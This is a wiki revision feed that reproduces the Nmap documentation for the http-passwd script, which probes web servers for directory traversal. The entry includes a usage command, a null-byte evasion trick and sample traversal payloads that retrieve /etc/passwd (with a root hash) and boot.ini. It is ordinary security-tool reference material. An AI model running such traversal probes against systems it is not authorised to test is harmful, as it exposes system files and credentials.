<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Nmap%3A_hack_password_via_http</id>
	<title>Nmap: hack password via http - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=Nmap%3A_hack_password_via_http"/>
	<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Nmap:_hack_password_via_http&amp;action=history"/>
	<updated>2026-04-20T03:45:19Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Nmap:_hack_password_via_http&amp;diff=51244&amp;oldid=prev</id>
		<title>Onnowpurbo: Created page with &quot; File http-passwd  Script types: portrule Categories: intrusive, vuln Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse User Summary  Checks if a web server is vulne...&quot;</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Nmap:_hack_password_via_http&amp;diff=51244&amp;oldid=prev"/>
		<updated>2018-06-01T02:51:19Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot; File http-passwd  Script types: portrule Categories: intrusive, vuln Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse User Summary  Checks if a web server is vulne...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&lt;br /&gt;
File http-passwd&lt;br /&gt;
&lt;br /&gt;
Script types: portrule&lt;br /&gt;
Categories: intrusive, vuln&lt;br /&gt;
Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse&lt;br /&gt;
User Summary&lt;br /&gt;
&lt;br /&gt;
Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.&lt;br /&gt;
&lt;br /&gt;
The script uses several technique:&lt;br /&gt;
&lt;br /&gt;
    Generic directory traversal by requesting paths like ../../../../etc/passwd.&lt;br /&gt;
    Known specific traversals of several web servers.&lt;br /&gt;
    Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in at the path controlled by the script argument http-passwd.root.&lt;br /&gt;
&lt;br /&gt;
Script Arguments&lt;br /&gt;
&lt;br /&gt;
http-passwd.root&lt;br /&gt;
&lt;br /&gt;
Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.&lt;br /&gt;
slaxml.debug&lt;br /&gt;
See the documentation for the slaxml library.&lt;br /&gt;
http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent&lt;br /&gt;
See the documentation for the http library.&lt;br /&gt;
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername&lt;br /&gt;
See the documentation for the smbauth library.&lt;br /&gt;
&lt;br /&gt;
Example Usage&lt;br /&gt;
&lt;br /&gt;
 nmap --script http-passwd --script-args http-passwd.root=/test/ &amp;lt;target&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Script Output&lt;br /&gt;
&lt;br /&gt;
 80/tcp open  http&lt;br /&gt;
 | http-passwd: Directory traversal found.&lt;br /&gt;
 | Payload: &amp;quot;index.html?../../../../../boot.ini&amp;quot;&lt;br /&gt;
 | Printing first 250 bytes:&lt;br /&gt;
 | [boot loader]&lt;br /&gt;
 | timeout=30&lt;br /&gt;
 | default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS&lt;br /&gt;
 | [operating systems]&lt;br /&gt;
 |_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=&amp;quot;Microsoft Windows XP Professional&amp;quot; /noexecute=optin /fastdetect&lt;br /&gt;
&lt;br /&gt;
 80/tcp open  http&lt;br /&gt;
 | http-passwd: Directory traversal found.&lt;br /&gt;
 | Payload: &amp;quot;../../../../../../../../../../etc/passwd&amp;quot;&lt;br /&gt;
 | Printing first 250 bytes:&lt;br /&gt;
 | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh&lt;br /&gt;
 | sshd:*:65532:65534::/:/bin/false&lt;br /&gt;
 | ftp:*:65533:65534::/:/bin/false&lt;br /&gt;
 |_nobody:*:65534:65534::/:/bin/false&lt;br /&gt;
&lt;br /&gt;
Requires&lt;br /&gt;
&lt;br /&gt;
    http&lt;br /&gt;
    shortport&lt;br /&gt;
    stdnse&lt;br /&gt;
    string&lt;br /&gt;
&lt;br /&gt;
Authors:&lt;br /&gt;
&lt;br /&gt;
    Kris Katterjohn&lt;br /&gt;
    Ange Gutek&lt;br /&gt;
&lt;br /&gt;
License: Same as Nmap--See https://nmap.org/book/man-legal.html&lt;/div&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
</feed>